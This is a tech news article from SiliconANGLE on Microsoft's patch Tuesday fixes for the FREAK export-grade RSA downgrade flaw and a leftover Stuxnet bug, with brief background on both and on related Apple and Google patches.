Microsoft patches FREAK and Stuxnet bugs for Windows PCs
One week after Microsoft released a security warning stating that hundreds of millions of Windows users could be at risk from the FREAK flaw, a bug that could allow hackers to intercept communications by forcing machines into loading weaker encryption, the Redmond company has issued an update (part of 14 updates for patch Tuesday) to fix the vulnerability.
The bug was not unique to Windows, and the FREAK update comes just one day after Apple Inc. issued a fix for iOS and OSX, while back on March 3rd Google released a patch for Chrome on Windows, OS X and Linux.
“This security update resolves a vulnerability in Microsoft Windows that facilitates exploitation of the publicly disclosed FREAK technique, an industry-wide issue that is not specific to Windows operating systems,” said Microsoft, adding that, “The vulnerability could allow a man-in-the-middle (MiTM) attacker to force the downgrading of the key length of an RSA key to EXPORT-grade length in a TLS connection. Any Windows system using Schannel to connect to a remote TLS server with an insecure cipher suite is affected.”
The vulnerability was discovered some weeks ago after French researchers found they could manipulate websites to use weak encryption, which they were then able to crack in a short time. After the encryption was broken the researchers could collect password data and take control of various elements of a webpage. Effectively, if hackers had exploited the flaw they would have been able to act as a man in the middle and come between users and servers on an insecure WiFi network. So far there is no evidence that the vulnerability was exploited by hackers.
FREAK (Factoring RSA Export Keys) originated in the 90’s when the U.S. government wanted to keep an eye on people, creating policies to weaken encryption and ban exports of the strongest encryptions. In spite of the law changing, some weaker encryptions migrated to modern software.
Also included in the updates was a Stuxnet bug patch, something Microsoft thought they had fixed back in 2010. Stuxnet was a worm allegedly created by the U.S. and Israeli governments some years ago to infiltrate Iran’s nuclear facility, crash computers, and in doing so destabilize Iran’s nuclear program. The worm has since been found on systems in other countries around the world.
Photo credit: Dave Rosen via photopin cc
A message from John Furrier, co-founder of SiliconANGLE:
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
